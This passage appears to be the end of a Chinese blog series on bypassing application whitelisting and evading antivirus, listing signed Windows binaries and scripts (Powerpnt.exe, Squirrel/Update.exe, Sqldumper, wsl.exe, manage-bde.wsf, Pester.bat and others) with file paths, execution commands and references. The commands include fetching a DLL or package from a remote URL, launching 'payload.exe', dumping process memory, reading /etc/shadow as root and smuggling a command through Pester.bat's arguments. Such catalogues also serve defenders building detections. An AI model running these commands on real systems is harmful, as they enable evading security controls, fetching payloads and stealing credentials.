文件路径: - C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
- C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
- C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
- C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
- C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
- C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
- C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
- C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
- C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
- C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
- C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
- C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
- C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
- C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
- C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
复制代码 执行方式:
- Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
复制代码 参考资料:
- https://twitter.com/reegun21/status/1150032506504151040
- https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
复制代码 rcsi.exeVisual Studio附带的非交互式命令行界面,和dnx一样rcsi可以执行C#代码,rcsi非交互式。
参考资料:
- https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
复制代码
Sqldumper.exe- 使用说明:Microsoft SQL附带的调试实用程序。
文件路径:
- C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
- C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
复制代码
执行方式:
- sqldumper.exe 464 0 0x0110
复制代码 参考资料:
- https://twitter.com/countuponsec/status/910969424215232518
- https://twitter.com/countuponsec/status/910977826853068800
- https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
复制代码 Sqlps.exe- 使用说明:Microsoft SQL Server附带的用于加载SQL Server cmdlet的工具。
文件路径: - C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
- C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
- C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
- C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
复制代码 执行方式:
参考资料:
- https://twitter.com/bryon_/status/975835709587075072
- https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
复制代码 SQLToolsPS.exeMicrosoft SQL附带的用于加载SQL Server cmdlts的工具。替代sqlps.exe。SQL Server 2016+中sqlps.exe的后继者。 文件路径: - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
复制代码 执行方式:
- SQLToolsPS.exe -noprofile -command Start-Process calc.exe
复制代码 参考资料:
- https://twitter.com/pabraeken/status/993298228840992768
- https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
复制代码 Squirrel.exeMicrosoft Teams安装的一部分,执行squirrel软件包。 文件路径:
- %localappdata%\Microsoft\Teams\current\Squirrel.exe
复制代码 执行方式:
- squirrel.exe --download [url to package]
- squirrel.exe --update [url to package]
- squirrel.exe --updateRoolback=[url to package]
复制代码 参考资料:
- https://www.youtube.com/watch?v=rOP3hnkj7ls
- https://twitter.com/reegun21/status/1144182772623269889
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
复制代码 Tracker.exe
- Tracker.exe /c "C:\Windows\System32\calc.exe"
- Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
复制代码 参考资料:
- https://twitter.com/subTee/status/793151392185589760
- https://attack.mitre.org/wiki/Execution
复制代码
Update.exeMicrosoft Teams安装的一部分,更新现有已安装的Nuget/squirrel软件包。 文件路径:
- %localappdata%\Microsoft\Teams\update.exe
复制代码
执行方式:- Update.exe --download [url to package]
- Update.exe --update [url to package]
- Update.exe --updateRollback=[url to package]
- Update.exe --processStart payload.exe --process-start-args "whatever args"
复制代码 参考资料:
- https://www.youtube.com/watch?v=rOP3hnkj7ls
- https://twitter.com/reegun21/status/1144182772623269889
- https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
复制代码 vsjitdebugger.exeVisual Studio中的jit调试工具。 文件路径: - c:\windows\system32\vsjitdebugger.exe
复制代码 执行方式:
- Vsjitdebugger.exe calc.exe
复制代码 参考资料:
- https://twitter.com/pabraeken/status/990758590020452353
复制代码
Wsl.exe从Windows命令行运行Linux工具. 文件路径: - C:\Windows\System32\wsl.exe
复制代码 执行方式:
- wsl.exe -e /mnt/c/Windows/System32/calc.exe
- wsl.exe -u root -e cat /etc/shadow
复制代码 参考资料:
- https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
复制代码 脚本文件(4个)CL_Mutexverifiers.ps1导入PowerShell Diagnostic CL_Mutexverifiers脚本,然后调用runAfterCancelProcess启动可执行文件。 文件路径:
- C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
- C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
- C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
复制代码 执行方式:
- . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1
复制代码 参考资料:
- https://twitter.com/pabraeken/status/995111125447577600
复制代码 CL_Invocation.ps1windows自带的诊断工具,可以执行exe文件 文件路径: - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
- C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
- C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
复制代码 执行方式:
- PS C:\> . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
- PS C:\> SyncInvoke cmd.exe "/c ipconfig > E:\ip.txt"
复制代码 参考资料:
- https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/
复制代码 Manage-bde.wsf用于管理BitLocker的脚本. 文件路径:
- C:\Windows\System32\manage-bde.wsf
复制代码 执行方式:
- set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
- copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
复制代码 参考资料:
- https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
- https://twitter.com/bohops/status/980659399495741441
复制代码 Pester.bat文件路径: - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
- c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
复制代码 执行方式:
- Pester.bat [/help|?|-?|/?] "$null; notepad"
复制代码 参考资料:
- <ol><li>https://twitter.com/Oddvarmoe/status/993383596244258816</li></ol>
复制代码 后记白名单篇终于完结,激动之情难以言表~~ 免杀专题文章终于也要接近尾声,撒花~~
|